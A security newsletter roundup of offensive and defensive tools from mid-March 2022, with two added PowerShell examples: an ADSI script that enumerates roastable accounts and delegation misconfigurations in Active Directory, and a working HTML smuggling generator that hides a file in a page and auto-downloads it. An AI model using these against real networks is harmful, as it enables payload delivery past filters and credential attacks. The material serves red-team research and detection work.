Last Week in Security (LWiS) - 2022-03-21

Browser in the Browser (@mrd0x), OSINT Map (@MalfratsInd), Rust packer (@verixvogel), local Kerberos to bypass UAC (@tiraniddo), crash to read/write in Chakra (@33y0re), AtlasC2 (@Gr1mmie), detecting Shadow Credentials (@cfalta), and more!

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2022-03-14 to 2022-03-21.

News

Techniques and Write-ups

Tools and Exploits

  • CustomKeyboardLayoutPersistence can achieve execution using a custom keyboard layout, tested on Windows 11 Home version 21H2. Warning: the PoC contains no uninstallation code, so clean up by hand after testing.
  • Group3r finds vulnerabilities in AD Group Policy, and does it better than Grouper2 did.
  • Malfrat's OSINT Map is an update to the OSINT Framework <https://osintframework.com/>. OSINT-Map is the GitHub repo if you'd like to contribute.
  • oxide is a PoC packer written in Rust.
  • AtlasC2 is a C# C2 Framework centered around Stage 1 operations.
  • poro is a tool to scan for publicly accessible assets in your AWS cloud environment.
  • snoop secretly records audio and video with Chromium-based browsers. Be sure to check out VOODOO, the macOS Man-in-the-Browser framework, as well.
  • Coeus is an ADSI-based situational awareness toolkit for domain environments, built with modularity in mind. It enumerates users, groups and computers as well as some common misconfigurations, including roasting (AS-REP roasting, Kerberoasting) and delegation (constrained, unconstrained, RBCD) attacks.
  • xepor is a web routing framework for reverse engineers and security researchers, brings the best of mitmproxy & Flask.
  • LeakedHandlesFinder is a tool for identifying leaked handles in Windows processes. Useful for finding new LPE vulnerabilities during a pentest, or simply as a new research process. It currently supports exploiting (autopwn) leaked process handles by spawning a new arbitrary process (cmd.exe by default).
  • AutoSmuggle is a utility to craft HTML smuggled files for Red Team engagements.
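
The misconfiguration classes Coeus enumerates, expressed as raw ADSI (System.DirectoryServices) queries. This is an added example, not Coeus' own code; it assumes a domain-joined host and discovers the search base from RootDSE. The Search-Ldap helper and the flag constants are this example's own names.

```powershell
# Added example (not Coeus' code): enumerate roasting and delegation
# misconfigurations over ADSI. Assumes a domain-joined host; the search base
# is read from RootDSE at runtime.

$rootDse = [ADSI]"LDAP://RootDSE"
$baseDn  = [string]$rootDse.defaultNamingContext
$bitAnd  = "1.2.840.113556.1.4.803"      # LDAP bitwise-AND matching rule OID

# userAccountControl flags used below
$UAC_ACCOUNTDISABLE         = 2
$UAC_SERVER_TRUST_ACCOUNT   = 8192       # set on domain controllers
$UAC_TRUSTED_FOR_DELEGATION = 524288     # unconstrained delegation
$UAC_DONT_REQ_PREAUTH       = 4194304    # AS-REP roastable
$UAC_TRUSTED_TO_AUTH        = 16777216   # constrained delegation with protocol transition

function Search-Ldap {
    param([string]$Filter, [string[]]$Attributes)
    $s = New-Object System.DirectoryServices.DirectorySearcher([ADSI]"LDAP://$baseDn", $Filter)
    $s.PageSize = 1000                   # paged results, so large domains are not truncated at 1000
    foreach ($a in $Attributes) { [void]$s.PropertiesToLoad.Add($a) }
    $s.FindAll()                         # emits SearchResult objects
}

"== AS-REP roastable: enabled users with Kerberos pre-authentication disabled"
Search-Ldap "(&(objectCategory=person)(objectClass=user)(userAccountControl:$bitAnd:=$UAC_DONT_REQ_PREAUTH)(!(userAccountControl:$bitAnd:=$UAC_ACCOUNTDISABLE)))" samaccountname |
    ForEach-Object { $_.Properties["samaccountname"][0] }

"== Kerberoastable: enabled users with an SPN (krbtgt excluded)"
Search-Ldap "(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*)(!(sAMAccountName=krbtgt))(!(userAccountControl:$bitAnd:=$UAC_ACCOUNTDISABLE)))" samaccountname,serviceprincipalname |
    ForEach-Object { "{0}: {1}" -f $_.Properties["samaccountname"][0], ($_.Properties["serviceprincipalname"] -join ", ") }

"== Unconstrained delegation (domain controllers excluded, they have it by design)"
Search-Ldap "(&(userAccountControl:$bitAnd:=$UAC_TRUSTED_FOR_DELEGATION)(!(userAccountControl:$bitAnd:=$UAC_SERVER_TRUST_ACCOUNT)))" samaccountname |
    ForEach-Object { $_.Properties["samaccountname"][0] }

"== Constrained delegation, flagging protocol transition (TRUSTED_TO_AUTH_FOR_DELEGATION)"
Search-Ldap "(msDS-AllowedToDelegateTo=*)" samaccountname,"msds-allowedtodelegateto",useraccountcontrol |
    ForEach-Object {
        $uac = [int]$_.Properties["useraccountcontrol"][0]
        $pt  = if ($uac -band $UAC_TRUSTED_TO_AUTH) { " [protocol transition]" } else { "" }
        "{0}{1} -> {2}" -f $_.Properties["samaccountname"][0], $pt, ($_.Properties["msds-allowedtodelegateto"] -join ", ")
    }

"== Resource-based constrained delegation: principals allowed to act on behalf of others to this object"
Search-Ldap "(msDS-AllowedToActOnBehalfOfOtherIdentity=*)" samaccountname,"msds-allowedtoactonbehalfofotheridentity" |
    ForEach-Object {
        $name = $_.Properties["samaccountname"][0]
        # The attribute is a binary security descriptor; the DACL lists who is trusted.
        $sd = New-Object System.DirectoryServices.ActiveDirectorySecurity
        $sd.SetSecurityDescriptorBinaryForm([byte[]]$_.Properties["msds-allowedtoactonbehalfofotheridentity"][0])
        $sids = $sd.GetAccessRules($true, $false, [System.Security.Principal.SecurityIdentifier]) |
            ForEach-Object { $_.IdentityReference.Value }
        "{0} <- {1}" -f $name, ($sids -join ", ")
    }
```

The RBCD query returns SIDs rather than names on purpose: a SID that no longer resolves (a deleted account that was once granted delegation) is itself a finding, and translating to NTAccount would throw on it. Run the script as any domain user; none of these attributes require elevated read rights by default.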

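What AutoSmuggle automates, shown as an added example that is not AutoSmuggle's own code: a PowerShell function that embeds an arbitrary file in an HTML page as base64 text, with inline JavaScript that reassembles it client-side as a Blob and triggers a download. The function name, parameters and the page template are this example's own.

```powershell
# Added example (not AutoSmuggle's code): build an HTML smuggling page.
# The payload never crosses the wire as a file download; it travels as text
# inside the page and is reassembled by the browser.
function New-SmuggledHtml {
    param(
        [Parameter(Mandatory)][string]$PayloadPath,   # file to embed
        [Parameter(Mandatory)][string]$OutFile,       # HTML page to write
        [string]$DownloadName = (Split-Path -Leaf $PayloadPath)  # name the browser saves as
    )

    $bytes = [System.IO.File]::ReadAllBytes((Resolve-Path -LiteralPath $PayloadPath).Path)
    $b64   = [Convert]::ToBase64String($bytes)

    # Single-quoted here-string: nothing inside is expanded by PowerShell,
    # placeholders are substituted afterwards.
    $template = @'
<!DOCTYPE html>
<html><body>
<script>
  // Decode the embedded base64 back into raw bytes and hand them to the
  // browser as a Blob; the anchor's download attribute names the saved file.
  var b64 = "__B64__";
  var bin = atob(b64);
  var bytes = new Uint8Array(bin.length);
  for (var i = 0; i < bin.length; i++) { bytes[i] = bin.charCodeAt(i); }
  var blob = new Blob([bytes], { type: "application/octet-stream" });
  var a = document.createElement("a");
  a.href = URL.createObjectURL(blob);
  a.download = "__NAME__";
  document.body.appendChild(a);
  a.click();
</script>
</body></html>
'@

    $html = $template.Replace("__B64__", $b64).Replace("__NAME__", $DownloadName)
    Set-Content -LiteralPath $OutFile -Value $html -Encoding UTF8
    return (Resolve-Path -LiteralPath $OutFile).Path
}

# Usage: New-SmuggledHtml -PayloadPath .\payload.bin -OutFile .\page.html
```

The same pattern is what detection content keys on: a page whose script calls atob, fills a Uint8Array, wraps it in a Blob and clicks a synthetic anchor with a download attribute is the signature of smuggling, regardless of what the payload is.
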
New to Me

This section is for news, techniques, write-ups, tools, and off-topic items that weren't released last week but are new to me. Perhaps you missed them too!

  • rust_bof: Cobalt Strike Beacon Object Files (BOFs) written in Rust, using Rust's core and alloc crates.
  • S1EM. This project is a SIEM with SIRP and Threat Intel, all in one.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.